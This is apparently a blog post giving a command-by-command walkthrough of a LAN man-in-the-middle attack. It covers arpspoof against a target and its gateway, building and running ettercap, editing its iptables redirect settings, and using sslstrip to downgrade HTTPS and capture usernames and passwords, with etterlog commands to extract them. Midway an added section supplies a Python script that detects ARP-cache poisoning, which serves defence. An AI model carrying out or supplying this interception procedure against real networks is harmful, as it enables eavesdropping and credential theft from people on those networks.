websec80


1. Enable IP forwarding on the machine in the middle; otherwise the target loses its network connection
echo 1 > /proc/sys/net/ipv4/ip_forward


2. Find the gateway

ip route | grep default


3. Install arpspoof

apt install dsniff


arpspoof -i <interface> -t <target_ip> -r <gateway_ip>


All of the target's traffic now passes through the machine in the middle.
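As an added defender-side example (not part of the original post): a Python script that parses the output of `ip neigh show` on a host and flags the two symptoms the arpspoof -r step above leaves in the victim's ARP cache. The sample table and MAC addresses are constructed; the gateway and target IPs are the ones used later on this page.

```python
"""Flag ARP-cache poisoning symptoms in `ip neigh show` output (added example)."""
import re
import subprocess
from collections import defaultdict

# Constructed sample of `ip neigh show` on a poisoned host: the gateway
# (10.0.0.1) and another host (10.0.0.200) both resolve to the same MAC.
SAMPLE_NEIGH = """\
10.0.0.1 dev eth0 lladdr aa:bb:cc:00:00:01 REACHABLE
10.0.0.200 dev eth0 lladdr aa:bb:cc:00:00:01 STALE
10.0.0.50 dev eth0 lladdr 11:22:33:44:55:66 REACHABLE
"""

NEIGH_RE = re.compile(r"^(\S+)\s+dev\s+(\S+)\s+lladdr\s+([0-9a-f:]{17})", re.I)


def parse_neigh(text):
    """Return {ip: mac} for every resolved neighbour entry."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def check_arp_table(text, gateway_ip, pinned_gateway_mac):
    """Return alert strings for two poisoning symptoms:
    (1) the gateway's MAC differs from the value the admin pinned;
    (2) one MAC answers for several IPs (the spoofing host claims both
        the gateway and the target when arpspoof runs with -r)."""
    table = parse_neigh(text)
    alerts = []
    pinned = pinned_gateway_mac.lower()
    gw_mac = table.get(gateway_ip)
    if gw_mac is not None and gw_mac != pinned:
        alerts.append(f"gateway {gateway_ip} MAC changed: expected {pinned}, saw {gw_mac}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    # Live check: read the real neighbour table; the pinned MAC is a placeholder.
    live = subprocess.check_output(["ip", "neigh", "show"], text=True)
    for alert in check_arp_table(live, "10.0.0.1", "00:00:00:00:00:00"):
        print("ALERT:", alert)
```

Run it periodically (cron, or a loop) and compare against a MAC recorded on a known-clean network; the second check works without any pinned value.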


4. Capture packets

dsniff, or tcpdump / urlsnarf, captures all HTTP requests

https://www.ettercap-project.org/downloads.html

wget https://github.com/Ettercap/ettercap/archive/v0.8.3.1.tar.gz

tar xzf v0.8.3.1.tar.gz
cd ettercap-0.8.3.1

mkdir build


cd build

cmake ../           # if cmake is missing: yum install cmake
make
make install


The build fails with assorted errors when the required dependencies are missing.

Install the dependencies:
yum install libnet-devel geoip-devel curl-devel libpcap-devel openssl-devel gtk3-devel ncurses ncurses-devel -y

ettercap -Tq -i eth0 | tee /tmp/log


Capturing HTTPS

Edit   vim /etc/ettercap/etter.conf

  #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
  #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Remove the leading #   and save

IPv6 needs the same (the ip6tables keys in etter.conf are redir6_command_on / redir6_command_off)

  redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
  redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Otherwise ettercap aborts with    FATAL ERROR: Can't insert firewall redirects

Remove the leading #   and save

Then run sslstrip -a -f -k to downgrade HTTPS to HTTP so that usernames and passwords can be read


ettercap -T -i eth0 -M arp:remote /10.0.0.200// /10.0.0.1// -q -w a.cap -l loginfo -L logall

etterlog -c logall.ecp -f /6.1.141.1//

etterlog -B -n -s -F TCP:10.0.0.200:50502:1.1.11.1:80 logall.ecp

etterlog -c logall.ecp 

 


etterlog -h

Usage: etterlog [OPTIONS] logfile

General Options:
-a, --analyze analyze a log file and return useful infos
-c, --connections display the table of connections
-f, --filter <TARGET> print packets only from this target
-t, --proto <proto> display only this proto (default is all)
-F, --filcon <CONN> print packets only from this connection
-s, --only-source print packets only from the source
-d, --only-dest print packets only from the destination
-r, --reverse reverse the target/connection matching
-n, --no-headers skip header information between packets
-m, --show-mac show mac addresses in the headers
-k, --color colorize the output
-l, --only-local show only local hosts parsing info files
-L, --only-remote show only remote hosts parsing info files

Search Options:
-e, --regex <regex> display only packets that match the regex
-u, --user <user> search for info about the user <user>
-p, --passwords print only accounts information
-i, --show-client show client address in the password profiles
-I, --client <ip> search for pass from a specific client

Editing Options:
-C, --concat concatenate more files into one single file
-o, --outfile <file> the file used as output for concatenation
-D, --decode used to extract files from connections

Visualization Method:
-B, --binary print packets as they are
-X, --hex print packets in hex mode
-A, --ascii print packets in ascii mode (default)
-T, --text print packets in text mode
-E, --ebcdic print packets in ebcdic mode
-H, --html print packets in html mode
-U, --utf8 <encoding> print packets in uft-8 using the <encoding>
-Z, --zero do not print packets, only headers
-x, --xml print host infos in xml format

Standard Options:
-v, --version prints the version and exit
-h, --help this help screen

 

etterlog 0.8.3.1 copyright 2001-2020 Ettercap Development Team

 

etterlog -c logall.ecp    # list all connections

=======================================================

Installing sslstrip

sslstrip is written in Python 2

Install pip2:   curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py

/bin/python get-pip.py

python -m pip install twisted

python -m pip install pyOpenSSL

git clone https://github.com/moxie0/sslstrip.git


Installing the Python 3 port

python3 -m pip install --upgrade pip

https://github.com/K1M4K-ID/sslstrip_1.0/blob/main/sslstrip.tar.gz

python3 -m pip install pyOpenSSL

python3 -m pip install service_identity

====================================================================

# list connections

etterlog -c -t tcp log.ecp | awk '{print $2":"$4}' | sed '1,5d' | xargs -I {} etterlog -B -n -s -F TCP:{} log.ecp

 

Posted by websec80